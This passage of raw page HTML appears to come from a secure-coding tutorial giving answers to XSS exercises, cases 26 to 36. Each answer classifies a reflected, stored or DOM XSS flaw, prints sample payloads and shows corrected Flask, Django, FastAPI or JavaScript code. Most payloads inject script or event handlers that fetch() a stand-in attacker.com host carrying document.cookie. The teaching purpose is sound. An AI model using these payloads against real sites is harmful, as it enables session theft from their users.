class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 26 — Answer </h3> <ol> <li><p>Reflected XSS. Wrong context Escaping. The <code>escape()</code> marks the parameter as safe for HTML execution, which is risky. We must escape javascript since user input is rendered inside a Javascript <code>&lt;script&gt;</code> element on the frontend.</p></li> <li><p>Once the escaping in the backend is removed the following payload will work:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">POST /login Content-Type: application/x-www-form-urlencoded username=";fetch('https://attacker.com/?q='+document.cookie);// </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">login</span><span class="p">():</span> <span class="n">username</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">username</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">password</span><span class="p">:</span> <span class="n">error</span> <span class="o">=</span> <span class="sh">"</span><span class="s">Error: username and password are required.</span><span class="sh">"</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">login.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="n">error</span><span class="p">)</span> <span class="k">if</span> <span class="n">username</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">admin</span><span class="sh">"</span> <span class="ow">or</span> <span class="n">password</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">secret</span><span class="sh">"</span><span class="p">:</span> <span class="n">error</span> <span class="o">=</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Error: invalid credentials for user </span><span class="si">{</span><span class="n">username</span><span class="si">}</span><span class="s">.</span><span class="sh">"</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">login.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="n">error</span><span class="p">)</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Welcome!</span><span class="sh">"</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/login.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;form</span> <span class="na">method=</span><span class="s">"POST"</span> <span class="na">action=</span><span class="s">"/login"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">name=</span><span class="s">"username"</span> <span class="na">placeholder=</span><span class="s">"Username"</span><span class="nt">&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"password"</span> <span class="na">name=</span><span class="s">"password"</span> <span class="na">placeholder=</span><span class="s">"Password"</span><span class="nt">&gt;</span> <span class="nt">&lt;button</span> <span class="na">type=</span><span class="s">"submit"</span><span class="nt">&gt;</span>Login<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;/form&gt;</span> {% if error %} <span class="nt">&lt;script&gt;</span> <span class="nf">alert</span><span class="p">({{</span> <span class="nx">error</span> <span class="o">|</span> <span class="nx">tojson</span> <span class="p">}});</span> <span class="nt">&lt;/script&gt;</span> {% endif %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 27 — Answer </h3> <ol> <li><p>Reflected XSS. Missing escaping. <code>mark_safe()</code> marks the input safe for HTML execution, which leaves <code>query</code> an attack vector for XSS. Remove <code>mark_safe()</code> since it marks input as safe for HTML execution, which leaves an attack vector for XSS.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?q=&lt;/strong&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;strong&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="k">def</span> <span class="nf">search_results</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">Result 1</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Result 2</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Result 3</span><span class="sh">"</span><span class="p">]</span> <span class="n">summary</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span><span class="sh">"</span><span class="s">&lt;p&gt;Showing results for: &lt;strong&gt;{}&lt;/strong&gt;&lt;/p&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="n">query</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">results.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">summary</span><span class="sh">"</span><span class="p">:</span> <span class="n">summary</span><span class="p">,</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">results</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- results.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Search Results<span class="nt">&lt;/h1&gt;</span> {{ summary }} <span class="nt">&lt;ul&gt;</span> {% for result in results %} <span class="nt">&lt;li&gt;</span>{{ result }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 28 — Answer </h3> <p>1.</p> <ul> <li>A. Reflected XSS for <code>username</code> variable. Misplaced Escaping. There is no need for <code>escape()</code> call in the backend. HTML autoescaping takes place in the template automatically.</li> <li>B. Wrong context escaping for <code>theme</code>. The <code>theme</code> in the template must be wrapped in double quotes for proper escaping of the HTML attribute.</li> </ul> <ol> <li>Payload for <code>username</code> once the <code>escape()</code> call is removed from the backend: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?username=&lt;/h1&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt; </code></pre> </div> <p>Payload for <code>theme</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>?theme=x onmouseover=fetch('https://attacker.com?q='+document.cookie) </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/profile</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">username</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">guest</span><span class="sh">"</span><span class="p">,</span> <span class="n">theme</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">light</span><span class="sh">"</span><span class="p">):</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">profile.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="n">username</span><span class="p">,</span> <span class="sh">"</span><span class="s">theme</span><span class="sh">"</span><span class="p">:</span> <span class="n">theme</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- templates/profile.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"{{ theme }}"</span><span class="nt">&gt;</span> <span class="nt">&lt;h1&gt;</span>Welcome, {{ username }}!<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>Your profile is loading...<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 29 — Answer </h3> <ol> <li><p>DOM XSS. Wrong context escaping. No need for <code>encodeURIComponent()</code> call in frontend. The <code>innerHTML</code> should be replaced with <code>textContent</code>.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>&lt;/p&gt;&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt;&lt;p&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Support Chat<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Live Support<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"chat-log"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;input</span> <span class="na">type=</span><span class="s">"text"</span> <span class="na">id=</span><span class="s">"msg-input"</span> <span class="na">placeholder=</span><span class="s">"Type a message..."</span><span class="nt">&gt;</span> <span class="nt">&lt;button</span> <span class="na">onclick=</span><span class="s">"sendMessage()"</span><span class="nt">&gt;</span>Send<span class="nt">&lt;/button&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">const</span> <span class="nx">chatLog</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">chat-log</span><span class="dl">"</span><span class="p">);</span> <span class="kd">function</span> <span class="nf">sendMessage</span><span class="p">()</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">input</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msg-input</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">msg</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">strong</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">strong</span><span class="dl">'</span><span class="p">);</span> <span class="nx">strong</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">You:</span><span class="dl">"</span><span class="p">;</span> <span class="nx">p</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">strong</span><span class="p">);</span> <span class="nx">p</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nf">createTextNode</span><span class="p">(</span><span class="dl">'</span><span class="s1"> </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">msg</span><span class="p">));</span> <span class="nx">chatLog</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 30 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;img</span> <span class="na">src=</span><span class="s">x</span> <span class="na">onerror=</span><span class="s">"fetch('https://attacker.com/?q='+document.cookie)"</span><span class="nt">&gt;</span> </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// components/CommentFeed.jsx</span> <span class="p">{</span><span class="nx">comments</span><span class="p">.</span><span class="nf">map</span><span class="p">((</span><span class="nx">comment</span><span class="p">,</span> <span class="nx">i</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">(</span> <span class="o">&lt;</span><span class="nx">li</span> <span class="nx">key</span><span class="o">=</span><span class="p">{</span><span class="nx">i</span><span class="p">}</span> <span class="nx">ref</span><span class="o">=</span><span class="p">{</span><span class="nx">el</span> <span class="o">=&gt;</span> <span class="nx">el</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">el</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">comment</span><span class="p">)}</span> <span class="sr">/</span><span class="err">&gt; </span><span class="p">))}</span> </code></pre> </div> <h3> Case 31 — Answer </h3> <ol> <li><p>Reflected XSS. Wrong context escaping. Javascript escaping required.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?msg=&lt;/p&gt;&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt;&lt;p&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- dashboard.html --&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showBanner</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">banner</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">banner</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">p</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`Notification: </span><span class="p">${</span><span class="nx">msg</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">banner</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"banner"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;h1&gt;</span>Dashboard<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">showBanner</span><span class="p">(</span><span class="dl">"</span><span class="s2">{{ msg|escapejs }}</span><span class="dl">"</span><span class="p">);</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 32 — Answer </h3> <ol> <li>Reflected XSS. Missing HTML escaping for: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;p&gt;</span>Your language preference: {lang}<span class="nt">&lt;/p&gt;</span> </code></pre> </div> <p>And missing HTML escaping for the href tag in:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;p&gt;</span>Visit our <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"/help?lang={lang}"</span><span class="nt">&gt;</span>help page<span class="nt">&lt;/a&gt;</span>.<span class="nt">&lt;/p&gt;</span> </code></pre> </div> <ol> <li>Payload targeting the href: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?lang=" onclick="fetch('https://attacker.com/?'+document.cookie) </code></pre> </div> <p>Payload targeting the <code>&lt;p&gt;</code> tag:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>/?lang=&lt;/p&gt;&lt;script&gt;fetch('https://attacker.com/?q='+document.cookie);&lt;/script&gt;&lt;p&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/settings</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">settings</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">,</span> <span class="n">lang</span><span class="p">:</span> <span class="nb">str</span> <span class="o">=</span> <span class="sh">"</span><span class="s">en</span><span class="sh">"</span><span class="p">):</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">lang.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">lang</span><span class="sh">"</span><span class="p">:</span> <span class="n">lang</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!--lang.html--&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Settings<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>Your language preference: {{lang}}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;p&gt;</span>Visit our <span class="nt">&lt;a</span> <span class="na">href=</span><span class="s">"/help?lang={{lang}}"</span><span class="nt">&gt;</span>help page<span class="nt">&lt;/a&gt;</span>.<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 33 — Answer </h3> <ol> <li><p>Stored XSS. Misplaced Escaping.</p></li> <li><p>Payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="err">POST</span><span class="w"> </span><span class="err">/activity</span><span class="w"> </span><span class="err">Content-Type:</span><span class="w"> </span><span class="err">application/json</span><span class="w"> </span><span class="p">{</span><span class="nl">"action"</span><span class="p">:</span><span class="w"> </span><span class="s2">"&lt;img src=x onerror=</span><span class="se">\"</span><span class="s2">fetch('https://attacker.com/?q='+document.cookie)</span><span class="se">\"</span><span class="s2">&gt;"</span><span class="p">}</span><span class="w"> </span></code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">jsonify</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">activity_feed</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/activity</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">add_activity</span><span class="p">():</span> <span class="n">data</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="nf">get_json</span><span class="p">()</span> <span class="n">action</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">action</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">activity_feed</span><span class="p">.</span><span class="nf">append</span><span class="p">(</span><span class="n">action</span><span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">saved</span><span class="sh">"</span><span class="p">})</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/feed</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">feed</span><span class="p">():</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">({</span><span class="sh">"</span><span class="s">feed</span><span class="sh">"</span><span class="p">:</span> <span class="n">activity_feed</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- feed.html --&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="nf">fetch</span><span class="p">(</span><span class="dl">"</span><span class="s2">/feed</span><span class="dl">"</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">data</span><span class="p">.</span><span class="nx">feed</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">item</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">feed</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">feed</span><span class="dl">"</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">p</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">p</span><span class="dl">'</span><span class="p">);</span> <span class="nx">p</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">item</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">feed</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 34 — Answer </h3> <ol> <li><p>No vulnerabilities. But the code is unclean. Better code is presented in (3.)</p></li> <li><p>No payloads.</p></li> <li><p>Fix:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Report</span> <span class="k">def</span> <span class="nf">search</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">GET</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">q</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">Report</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">filter</span><span class="p">(</span><span class="n">title__icontains</span><span class="o">=</span><span class="n">query</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">title.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">query</span><span class="sh">"</span><span class="p">:</span> <span class="n">query</span><span class="p">,</span> <span class="sh">"</span><span class="s">results</span><span class="sh">"</span><span class="p">:</span> <span class="n">results</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!--title.html--&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h2&gt;</span>Results for: {{ query }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for result in results %} <span class="nt">&lt;li&gt;</span>{{ result.title }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 35 — Answer </h3> <ol> <li><p>DOM XSS. Missing escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>&lt;/li&gt;&lt;img src=x onerror="fetch('https://attacker.com/?q='+document.cookie)"&gt;&lt;li&gt; </code></pre> </div> <ol> <li>Fix: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script&gt;</span> <span class="nx">input</span><span class="p">.</span><span class="nf">addEventListener</span><span class="p">(</span><span class="dl">"</span><span class="s2">input</span><span class="dl">"</span><span class="p">,</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">query</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">value</span><span class="p">;</span> <span class="nf">fetch</span><span class="p">(</span><span class="s2">`/api/suggestions?q=</span><span class="p">${</span><span class="nx">query</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">res</span> <span class="o">=&gt;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">())</span> <span class="p">.</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">data</span><span class="p">.</span><span class="nx">results</span><span class="p">.</span><span class="nf">forEach</span><span class="p">(</span><span class="nx">item</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">li</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nf">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">li</span><span class="dl">'</span><span class="p">);</span> <span class="nx">li</span><span class="p">.</span><span class="nx">className</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">suggestion</span><span class="dl">'</span><span class="p">;</span> <span class="nx">li</span><span class="p">.</span><span class="nx">textContent</span> <span class="o">=</span> <span class="s2">`</span><span class="p">${</span><span class="nx">item</span><span class="p">.</span><span class="nx">name</span><span class="p">}</span><span class="s2">`</span><span class="p">;</span> <span class="nx">suggestions</span><span class="p">.</span><span class="nf">appendChild</span><span class="p">(</span><span class="nx">li</span><span class="p">);</span> <span class="p">});</span> <span class="p">});</span> <span class="p">});</span> <span class="nt">&lt;/script&gt;</span> </code></pre> </div> <h3> Case 36 — Answer </h3> <ol> <li><p>DOM XSS. Missing Escaping.</p></li> <li><p>Sample payload:<br> </p></li> </ol> <div class="highlight js-code-highlight"> 